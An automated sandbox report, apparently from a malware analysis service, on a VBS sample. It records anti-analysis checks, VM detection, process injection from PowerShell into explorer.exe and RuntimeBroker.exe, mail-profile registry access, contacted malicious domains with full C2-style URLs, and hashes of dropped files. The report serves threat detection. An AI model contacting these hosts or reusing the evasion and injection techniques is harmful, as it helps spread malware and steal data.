Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4152			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4845			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onerous.tar	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe TID: 496	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: explorer.exe, 00000022.00000000.905298980.000000000A897000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluser
Source: wscript.exe, 00000001.00000002.695335003.0000016FDFC20000.00000002.00000001.sdmp, explorer.exe, 00000022.00000002.1106865055.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.911812823.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000022.00000000.904206243.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000024.00000000.905498421.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000000.904206243.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000026.00000000.916592002.000001B4F862A000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
Source: explorer.exe, 00000022.00000000.916100771.000000000FDB8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000022.00000000.898078750.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: wscript.exe, 00000001.00000002.695335003.0000016FDFC20000.00000002.00000001.sdmp, explorer.exe, 00000022.00000002.1106865055.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.911812823.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000022.00000000.904712884.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 00000024.00000000.909578698.0000027D4E75E000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: wscript.exe, 00000001.00000002.695335003.0000016FDFC20000.00000002.00000001.sdmp, explorer.exe, 00000022.00000002.1106865055.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.911812823.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000022.00000000.904712884.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: wscript.exe, 00000001.00000002.695335003.0000016FDFC20000.00000002.00000001.sdmp, explorer.exe, 00000022.00000002.1106865055.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.911812823.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 17896BA0000 protect: page execute and read and write

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: BD4F1580

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EC000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 30F0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Analysis Report 1qdMIsgkbwxA.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 6076
Source: C:\Windows\explorer.exe	Thread register set: target process: 6408
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5220

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EC000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 30F0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF3000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386883000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6E8DA5FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 17896BA0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6E8DA5FD0

Source: explorer.exe, 00000022.00000002.1090747095.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000022.00000002.1091744462.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1091914165.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000022.00000002.1091744462.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1091914165.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000022.00000002.1091744462.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1091914165.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000022.00000002.1091744462.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1091914165.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000022.00000000.904712884.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Name	IP	Active
c56.lepini.at	47.241.19.44	true
resolver1.opendns.com	208.67.222.222	true
api3.lepini.at	47.241.19.44	true
api10.laptok.at	47.241.19.44	true

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/lnky_2BCA00/qgKlpnuL6qqwWj/W6VQ6Sik97XOa0BNWrb0C/keiyUVxuATj3E4_2/B_2BL_2FugJJ4Da/e7_2B4XLfQlvJrZ9Le/WhpxrI8Qq/A9BYlHAq1pwRqOmJTzam/mWVelK2_2BYK1zvhvqK/fXbmIkxvhcADgSIQiDjWz8/yPKK_2B5D5OGK/5zsDFW_2/FB8d_2FomEKPNCxkvLH0E2Y/aGMQdayWN4/Np1rmkye3WmvYQxxa/_2B9MSj81d1r/vMbKOV0Oc2Z/w8Oet7rXw8d8w_/0A_0DTjqjqAs4lYaBYm_2/Bc9aaErU2YqC55qH/21nD1bQOJUIFPr2/NUHbqYXczyTGkooUru/1_2FbIo	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/Ppg0SH3ST3F/gucfDC73uafDmu/gxsngv0uRNgnUVK0QlHnA/X7DKkb5CZMRqAKlB/hMyibbLULRMdGzW/8aUaFmxZTQkn_2FN0N/XmgfYzKyl/ncmoRgHFL7cO3LUkPRQT/g5v0Ce65HovCMd9Lxtb/m01hA6EHX5Yso_2FMN9boY/wk_2Fij2hlpZj/sPC5Voax/EuORPnJSkBBgKdRWlcJHPqP/ZhmDzQyS5Z/3_2BTW42M24D_2FIQ/Dlj_2Bz0fn0e/_2FDhNsL1LB/juis8Ki_0A_0DL/kKdGS_2FHG_2B7hGixY1_/2FN_2FOOamFpN_2F/odmYHfyCeWNV/9ztJbtN	false	Avira URL Cloud: safe	unknown

ID:	321725
Product:	CloudBasic
Start time:	16:08:20
Start date:	23.11.2020
Sample:	1qdMIsgkbwxA.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	97c7dfecae90c288dfd43c600559b5b4
SHA1:	196f7b6a4d7023337e218ab0e04bba3bcfde128a
SHA256:	698d96faec08cf39e06348e4dfa3ef631ee09fc52d4dcce16f05bc7cb240bbcc

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{042D6C6F-2D9E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	7D31496EA07F0A125C5586EAB7FEAC4A	1382361D4284B7763116620E17F3166A1BC478B5	CDE9E2303AA9AFC2BB1FDDF8DCF2D91B462AAB5C48D18715C6252FB77D6E79D3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E7E9714D-2D9D-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	4D8C53B255BFB01D230C50F27D636738	E085D1CD3A3F703AA370467101EF591FF8B57FF3	FAE1F33E79C7AE6CD159BCEB861F4E112126A2CF8EE84C2945F0C3C4A7A2A31D
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042D6C71-2D9E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	5B8E4190AFCA6E758C28F9895FD9841F	7B4F6BB011A1E9F782550A18FAC5741B03A3F594	CAF246A05864811423FA275EB065CECA62448DC1A109F43C1122A5E0EE33B02C
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042D6C73-2D9E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	3D3C26ABA033AC73D7956C488A84B806	C8536E393EC33387166D2A614531A918E4BE71FE	616E2881CD31265BB8C8DACA744FDF538F5C0CBC5DCBF987A85DE8F7323C70C5
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E7E9714F-2D9D-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	57826B04C5C7D5CE483AEAA78148C78D	4135CB5BC4A3BCD52680732354487C979CAA69E9	A54C264F7BF6104640ECC36C8E3D5DF531DAC7D1EDF6F97CB3D701159104375A
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	843C19905D9E905E7631D30F52A124BC	CFC14C5CB6840DF5242294DC1318EC17D3D85B87	D661D4C4722C835DBC468C2F21DB7EC7DE9D82CA30F3267788559EBC55EEAFDD
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	FE6A2CDE42F9A5F0A78EBCA95BE7651A	0DC04BB2CD9148A2297AB92B89976B5D1C8888AF	8AF05E4C6D823D343431CD06127EF2E70839E51078784F09657AEECC0E9079F1
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	B03A9F6BAF50E13212326094898B7D72	736E5754B2414D05A77EF12EB026C2C5E3A3901C	E2D7350EA2C43B29D83D00F5D66458D317EC2C2D7DFCEB43178EE3DE72CCA1B1
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	96D15CA2E7CC0770CC2BBDD5CC61BF71	D1207C54B4FD889983F074B050C68C7849F40F97	9B725C1476E239931A5BCC28A89EEBD1780C52FAE2705D1D52BA16B794D158C7
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	49A1F5C99A9809AAF17AD390C5836FD7	D0DE2DA32BD29D2158804687AEFDC6B91EAEC8F7	C6A234EFD509A94477F928AB465B9B8611E007523CE54127673E0B7F4D9496F3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	EE9B5413E6EEE1130101E150C40AB929	8A18681EAC6B9EC482E000E7A1540834E3B3A441	7D17FAD10491F7C0FDA525481AF3EE89B0A572D4D21BBCAE084A17CABB997F2D
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	FB01C0E5C9DE9E19F5D1F0DF6C17F0BC	5B461A8276BCFAF782B27BFE1B43A11D8FB54158	58818153BD5DE1680ED44F1535F604EB8D9E63BDA89AFC7A92D801DC48E773E8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	528D09DF9BB4D7D9650CE5F1E70DDF5F	CB56E7184FD4B6BDCA1FB06A10030D3E0E9B4A65	99573B7A057A30E85F56B1CA5698079B8C413A273D486B54AA8026E219F70E0F
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	3734DF2A8F447C186FE2C39F574FA350	5B1196789FF8535E6C370D2AFE1428D829321CF6	8F9BDF1B863092C577AFD90640CAD3F5DBE1EF4C54AEA284C2458C976EC25138
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\uh[1].htm	ASCII text, with very long lines, with no line terminators	BF32F421FA2847FAA8DB0BE9201BA6DE	FD7A60D7431272DD5906940F08933E9A86A4283B	FCA7FA4DFFAD605B97E30A75F5847E54E1B16D89B13C2542ACA5B1208F400F9A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\4DcbwPY[1].htm	ASCII text, with very long lines, with no line terminators	E69A66BA1BFF6972458D1BC41252EE98	262423E195EE52FE55A2FA3CCD97E9B6619117A5	F1D70F929CDCB80F5CD8AAE9F8A41AB63FA171F224206A020596F73E88E384B2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\1_2FbIo[1].htm	ASCII text, with very long lines, with no line terminators	AB868B345CA418AA4FACC6D46BD38178	A0A4189DC35EF39534A2EE41980275348B7AA8EE	DAA9372E5A21C9079A646855110C83154D77B5E6DF2F37E949EA8452ABC1EF27
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	7A57D8959BFD0B97B364F902ACD60F90	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C85C42A32E22DE29393FCCCCF3BBA96E	EAF3755C63061C96400536041D4F4EB8BC66E99E	9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
C:\Users\user\AppData\Local\Temp\36CC.bin	data	65D6AF69282690AA378609B68861C36B	D6AA3A7FCE9ED6D1685171F20F69FC2B52632894	624BB8B4EEC113C6F8B10327237EDC6372EE1C64E22E7828157A5DC90D240374
C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.0.cs	UTF-8 Unicode (with BOM) text	D318CFA6F0AA6A796C421A261F345F96	8CC7A3E861751CD586D810AB0747F9C909E7F051	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	E19C37782C84843E3B17C5A888B096AD	3BA6B3C04194054A3E55B37031D862B658480AF7	BDE414D82532EA1F2AB3A9267C5BB0D68EC93655251B7C9CDEB26566209BE5D9
C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	6FB7403A018AA78450E0C193F562C040	A2A2F5E464728536034747A92078E02C63C25EC8	21DA87F277CBACF2D0B698516CD2DBEC0FFF8486B035D37C770952176A4465D5
C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\5ya1ligq\CSC6D2B83ED4FA544BDA58AEA85D7B55542.TMP	MSVC .res	A2ED7185EA025CBCCA4B3B920FC6CCB3	A5E49ED4FB4C7F96CDDFE94E503F279B7E84B148	8B13577DE0D38B12F17F6AD3F35CD1931B1A4FD43B472B493605378DBA5F33C2
C:\Users\user\AppData\Local\Temp\D542.bin	ASCII text, with CRLF line terminators	ADD4B50DC4DAF45E663B9BE977762EE2	F90E3D4AEF4F40A72B8276620E2110732EBB5A13	A272D182346C63E89504CB688B9BC2916B95F68D2E04BAC7E4DC55E7895D2714
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	472984818AAB8EAFDCFF8AC673DD3DA5	CEB1253808A42BF50F6291D875471FBFEEB6551C	54DC0D9FB58AC375245C9A86940EE8D7D7C5C20A3F0F31A6367F694E4DD8929A
C:\Users\user\AppData\Local\Temp\RESB088.tmp	data	4AFD8B4B8ACDDFDA8D65D12DC3E625F2	B4A8878BE6290BBEE94F4938CA7AB467CC36EF9E	6272F7F95E3A2970EB769F63956EA68AE462EEC0130D9B092226ECA7B909ADC8
C:\Users\user\AppData\Local\Temp\RESC75B.tmp	data	DD3BE7AA829C90C6AFD9A7BA4F949BD7	371D39DE1E6A65F54F9E43FEAF6DEEC641824A87	AB3A4FF73CC98EBC2DB3AA7D7B569C2C6CF6410364B135F3C0578B0C4DDDD1E3
